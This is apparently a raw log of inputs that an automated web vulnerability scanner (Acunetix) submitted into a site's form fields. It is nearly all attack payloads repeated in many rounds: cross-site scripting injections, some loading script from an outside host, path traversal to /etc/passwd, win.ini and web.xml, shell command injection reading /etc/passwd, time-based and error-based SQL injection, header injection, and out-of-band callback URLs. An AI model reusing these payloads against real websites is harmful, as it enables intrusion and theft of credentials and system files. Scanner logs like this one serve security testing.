1'"()&%<ScRiPt >prompt(957166)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1

1

1

'"()&%<ScRiPt >prompt(946468)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

1

1_937826

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1

WEB-INF/web.xml

1

1

1

acu3756\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3756

WEB-INF\web.xml

1

1

acux8988\xc0\xbez1\xc0\xbcz2a\x90bcxuca8988

1

1

1

1<ScRiPt >prompt(981430)</ScRiPt>

1

1

1

1<script>prompt(927058)</script>

1

1

1

1

1<ScRiPt >prompt(993402)</ScRiPt>

1

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996011></ScRiPt>

1

1

1<ScRiPt >prompt(933717)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(989545)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(950142)"></g></svg>

1

1

1<div style=width:expression(prompt(980353))>

1

1

1

1<iframe src='data:text/html

1

1

1<body onload=prompt(967788)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(971974)>

1<img src=xyz OnErRor=prompt(948359)>

1

1<img/src=">" onerror=alert(994447)>

1

1<ScRiPt%20>prompt(976723)</sCripT>

1

1&lt

1

\xf6<img acu onmouseover=prompt(983002) //\xf6>

1<input autofocus onfocus=prompt(986482)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1_zeyUc <ScRiPt >prompt(909305)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9427479*9994002)

1

'+response.write(9427479*9994002)+'

"+response.write(9427479*9994002)+"

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

${99673+99114}

1&n905473=v912242

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

)

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

!(()&&!|*|*|

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

testasp.vulnweb.com

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

-1

1

'"()

-1)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

-1))

'

/etc/passwd

1

1

1

L0RKLZJj'

1

"

1

BQlj7zXv')

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

h6mQL457'))

||cat /etc/passwd

acunetix_wvs_invalid_filename

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

-1

&dir

${@print(md5(acunetix_wvs_security_test))}

http://hito4bafQKuLs.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

-1)

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

1

1

comments/.

"&dir&"

-1))

1

1

file:///etc/passwd

1

1

1

lGxwj0Bc'

|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

LpRq06k5')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

WEB-INF/web.xml

1

zVT3lR4J'))

'|dir

1

1

1

WEB-INF\web.xml

1

"|dir

1'"()&%<ScRiPt >prompt(907764)</ScRiPt>

'"

response.write(9717617*9933476)

../../../../../../../../../../windows/win.ini

1

1

<!--

'"()&%<ScRiPt >prompt(953123)</ScRiPt>

'+response.write(9717617*9933476)+'

1

1

../../../../../../../../../../boot.ini

"+response.write(9717617*9933476)+"

1

1_917345

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

&cat /etc/passwd&

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

................windowswin.ini

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

1

${100019+99686}

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

acu9016\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9016

WEB-INF/web.xml

1

acux1845\xc0\xbez1\xc0\xbcz2a\x90bcxuca1845

1

1

/etc/passwd

1

WEB-INF\web.xml

1

1<ScRiPt >prompt(958178)</ScRiPt>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

'

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<script>prompt(989082)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"

1some_inexistent_file_with_long_name%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<ScRiPt >prompt(930510)</ScRiPt>

-1

1

||cat /etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?918737></ScRiPt>

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

testasp.vulnweb.com

1

1

-1))

1<ScRiPt >prompt(925623)</ScRiPt>

1&n955209=v950083

'&dir&'

1

1

1<video><source onerror="javascript:prompt(982709)">

onzJqaFU'

1

"&dir&"

)

1

1

!(()&&!|*|*|

LvTrFBxq')

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943742)"></g></svg>

file:///etc/passwd

1

1

|dir

^(#$!@#$)(()))******

WVWZKsPw'))

1<div style=width:expression(prompt(993308))>

'"()

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

-1

1<iframe src='data:text/html

WEB-INF/web.xml

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

1<body onload=prompt(950336)>

"|dir

1

-1)

1

1

1

"

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(958858)>

1

http://hitaprTfEu5xQ.bxss.me/

1

1

-1))

1

1<img src=xyz OnErRor=prompt(946615)>

1

${@print(md5(acunetix_wvs_security_test))}

../../../../../../../../../../windows/win.ini

1

1d5qyLWF'

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../../../../../../../../../../boot.ini

1

1

${@print(md5(acunetix_wvs_security_test))}\

1<img/src=">" onerror=alert(915844)>

mdE7hmR6')

1

http://www.acunetix.tst

comments

1

'"

1

1<ScRiPt%20>prompt(923204)</sCripT>

zLEj5tp3'))

1'"()&%<ScRiPt >prompt(938588)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

<!--

comments

1

1

'"()&%<ScRiPt >prompt(984234)</ScRiPt>

1&lt

1

comments/.

1

1

1

\xf6<img acu onmouseover=prompt(969538) //\xf6>

1_945640

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

1<input autofocus onfocus=prompt(930732)>

1

................windowswin.ini

1

response.write(9500260*9247400)

1

<a href='http://www.acunetix.com'>website security</a>

1

..\..\..\..\..\..\..\..\windows\win.ini

'+response.write(9500260*9247400)+'

1

1

1

1

&cat /etc/passwd&

[url=http://www.acunetix.com]website security[/url]

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

"+response.write(9500260*9247400)+"

'&cat /etc/passwd&'

1_5le5W <ScRiPt >prompt(951119)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

"&cat /etc/passwd&"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

acu8219\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8219

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

acux10802\xc0\xbez1\xc0\xbcz2a\x90bcxuca10802

../../../../../../../../../../etc/passwd

1

1

1

1

WEB-INF\web.xml

1

1

1<ScRiPt >prompt(907528)</ScRiPt>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

|cat /etc/passwd#

${99180+99006}

1

../../../../../../../../../../etc/passwd.jpg

1<script>prompt(960431)</script>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(956986)</ScRiPt>

-1

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n979042=v926618

1

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934498></ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

1

1<ScRiPt >prompt(997522)</ScRiPt>

-1))

1

testasp.vulnweb.com

1

1

1

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<video><source onerror="javascript:prompt(921049)">

uTxnCARe'

1

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988210)"></g></svg>

'

!(()&&!|*|*|

tfJY32vf')

1

1

1

1<div style=width:expression(prompt(987867))>

^(#$!@#$)(()))******

AgwOKZIa'))

'"()

/etc/passwd

"

'

1

1<iframe src='data:text/html

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

"

1

1<body onload=prompt(957410)>

-1)

1

1

1

1

&dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933337)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1))

http://hitiaqGPd0yb6.bxss.me/

1

1

1<img src=xyz OnErRor=prompt(994272)>

1

qHVFkXru'

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

1

1<img/src=">" onerror=alert(956036)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

acunetix_wvs_invalid_filename

1

"&dir&"

TW0wq3of')

1

1

comments

http://www.acunetix.tst

1

1<ScRiPt%20>prompt(913415)</sCripT>

'"

|dir

file:///etc/passwd

1

buudp5Y0'))

comments

1&lt

<!--

1'"()&%<ScRiPt >prompt(956366)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

1

'|dir

1

'"()&%<ScRiPt >prompt(945068)</ScRiPt>

1

\xf6<img acu onmouseover=prompt(945826) //\xf6>

1

WEB-INF/web.xml

"|dir

1

1

1

1_931661

1<input autofocus onfocus=prompt(978996)>

1

WEB-INF\web.xml

1

1

response.write(9150401*9217937)

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'+response.write(9150401*9217937)+'

1

../../../../../../../../../../windows/win.ini

[url=http://www.acunetix.com]website security[/url]

1

"+response.write(9150401*9217937)+"

1

1

1

../../../../../../../../../../boot.ini

1_zKCOK <ScRiPt >prompt(924388)</ScRiPt>

1

1

1

1

&cat /etc/passwd&

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu3867\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3867

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

acux3272\xc0\xbez1\xc0\xbcz2a\x90bcxuca3272

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"&cat /etc/passwd&"

1

................windowswin.ini

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<ScRiPt >prompt(978965)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1<script>prompt(941531)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

`cat /etc/passwd`

-1)

1

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt >prompt(955442)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

${100047+100040}

1

1

-1))

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952153></ScRiPt>

|cat /etc/passwd#

1

U6r4WE0i'

1&n984292=v993453

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<ScRiPt >prompt(944432)</ScRiPt>

1

1some_inexistent_file_with_long_name%00.jpg

dkF8euB6')

'|'ld

!(()&&!|*|*|

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<video><source onerror="javascript:prompt(920197)">

"|"ld

^(#$!@#$)(()))******

veddXtuc'))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF/web.xml

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969720)"></g></svg>

1

-1

1

1<div style=width:expression(prompt(975829))>

/etc/passwd

WEB-INF\web.xml

1

testasp.vulnweb.com

1

1<iframe src='data:text/html

'

1

-1)

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1))

"

1

1<body onload=prompt(969214)>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

pLXz7H5m'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950042)>

||cat /etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

x1X1yJfd')

1<img src=xyz OnErRor=prompt(942745)>

1

"

1

&dir

1

1

1

KTjc1mJr'))

1<img/src=">" onerror=alert(957140)>

http://hith0ArTZOYSA.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}

'&dir&'

1<ScRiPt%20>prompt(944841)</sCripT>

1

1

file:///etc/passwd

1

1&lt

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

\xf6<img acu onmouseover=prompt(989511) //\xf6>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

comments

|dir

http://www.acunetix.tst

1

1

comments

WEB-INF/web.xml

1

1<input autofocus onfocus=prompt(988003)>

'"

1

comments/.

'|dir

1'"()&%<ScRiPt >prompt(929330)</ScRiPt>

1

<!--

<a href='http://www.acunetix.com'>website security</a>

WEB-INF\web.xml

"|dir

1

1

1

'"()&%<ScRiPt >prompt(910875)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_964144

1

1

response.write(9967884*9087435)

1_NS6id <ScRiPt >prompt(923082)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../boot.ini

'+response.write(9967884*9087435)+'

1

1

&cat /etc/passwd&

1

../../../../../../../../../../windows/win.ini.jpg

"+response.write(9967884*9087435)+"

1

1

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

acu10078\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10078

................windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

acux6495\xc0\xbez1\xc0\xbcz2a\x90bcxuca6495

1

1

`cat /etc/passwd`

..\..\..\..\..\..\..\..\windows\win.ini

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1<ScRiPt >prompt(929174)</ScRiPt>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

${99448+99778}

|cat /etc/passwd#

1<script>prompt(943762)</script>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

1<ScRiPt >prompt(977581)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

'|'ld

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n943326=v997786

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988435></ScRiPt>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

!(()&&!|*|*|

1

1<ScRiPt >prompt(937393)</ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

pj7XhkPw'

testasp.vulnweb.com

1

1<video><source onerror="javascript:prompt(982196)">

WEB-INF/web.xml

'

^(#$!@#$)(()))******

1

/etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(994419)"></g></svg>

1

'"()

qtyCl5BV')

1

1<div style=width:expression(prompt(922065))>

"

WEB-INF\web.xml

1

1

nulHJdT8'))

1<iframe src='data:text/html

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1

1

||cat /etc/passwd

1

1

1<body onload=prompt(970964)>

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1))

&dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990992)>

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

GBq1NXKG'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

1<img src=xyz OnErRor=prompt(944781)>

1

oxVvst1F')

1

'

1<img/src=">" onerror=alert(998371)>

1

1

1

"&dir&"

acunetix_wvs_invalid_filename

1

"

file:///etc/passwd

O5nZFDQ8'))

1<ScRiPt%20>prompt(914429)</sCripT>

|dir

comments

1

1

http://hita0zVDHNued.bxss.me/

/\../\../\../\../\../\../\../etc/passwd

1&lt

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

'|dir

comments

1

${@print(md5(acunetix_wvs_security_test))}\

WEB-INF/web.xml

\xf6<img acu onmouseover=prompt(922190) //\xf6>

"|dir

comments/.

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1<input autofocus onfocus=prompt(986446)>

1'"

1

WEB-INF\web.xml

1

1

1

1

1

1

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(109),CHAR(99),CHAR(103),CHAR(72),CHAR(112),CHAR(52),CHAR(50),CHAR(118)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

<a href='http://www.acunetix.com'>website security</a>

http://www.acunetix.tst

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../windows/win.ini

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(109),CHAR(99),CHAR(103),CHAR(72),CHAR(112),CHAR(52),CHAR(50),CHAR(118)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

1

1

1_6qVjn <ScRiPt >prompt(937068)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(109)+CHAR(99)+CHAR(103)+CHAR(72)+CHAR(112)+CHAR(52)+CHAR(50)+CHAR(118)) FROM syscolumns)

1

1

../../../../../../../../../../windows/win.ini.jpg

1

'"

1

1

1'"()&%<ScRiPt >prompt(969312)</ScRiPt>

1

response.write(9426101*9095846)

1

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(109)+CHAR(99)+CHAR(103)+CHAR(72)+CHAR(112)+CHAR(52)+CHAR(50)+CHAR(118))

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'"()&%<ScRiPt >prompt(921723)</ScRiPt>

1

1

<!--

1

1_976893

1

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(77),CHAR(83),CHAR(115),CHAR(112),CHAR(52),CHAR(110),CHAR(78),CHAR(56)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

1

'+response.write(9426101*9095846)+'

................windowswin.ini

1

1

1

1

"+response.write(9426101*9095846)+"

1

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(77),CHAR(83),CHAR(115),CHAR(112),CHAR(52),CHAR(110),CHAR(78),CHAR(56)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

&cat /etc/passwd&

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(77)+CHAR(83)+CHAR(115)+CHAR(112)+CHAR(52)+CHAR(110)+CHAR(78)+CHAR(56)) FROM syscolumns)+'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(77)+CHAR(83)+CHAR(115)+CHAR(112)+CHAR(52)+CHAR(110)+CHAR(78)+CHAR(56))+'

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'&cat /etc/passwd&'

1

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(122),CHAR(55),CHAR(68),CHAR(121),CHAR(48),CHAR(109),CHAR(72)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

acu8865\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8865

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(122),CHAR(55),CHAR(68),CHAR(121),CHAR(48),CHAR(109),CHAR(72)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

acux8566\xc0\xbez1\xc0\xbcz2a\x90bcxuca8566

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(50)+CHAR(122)+CHAR(55)+CHAR(68)+CHAR(121)+CHAR(48)+CHAR(109)+CHAR(72)) FROM syscolumns)+"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(50)+CHAR(122)+CHAR(55)+CHAR(68)+CHAR(121)+CHAR(48)+CHAR(109)+CHAR(72))+"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

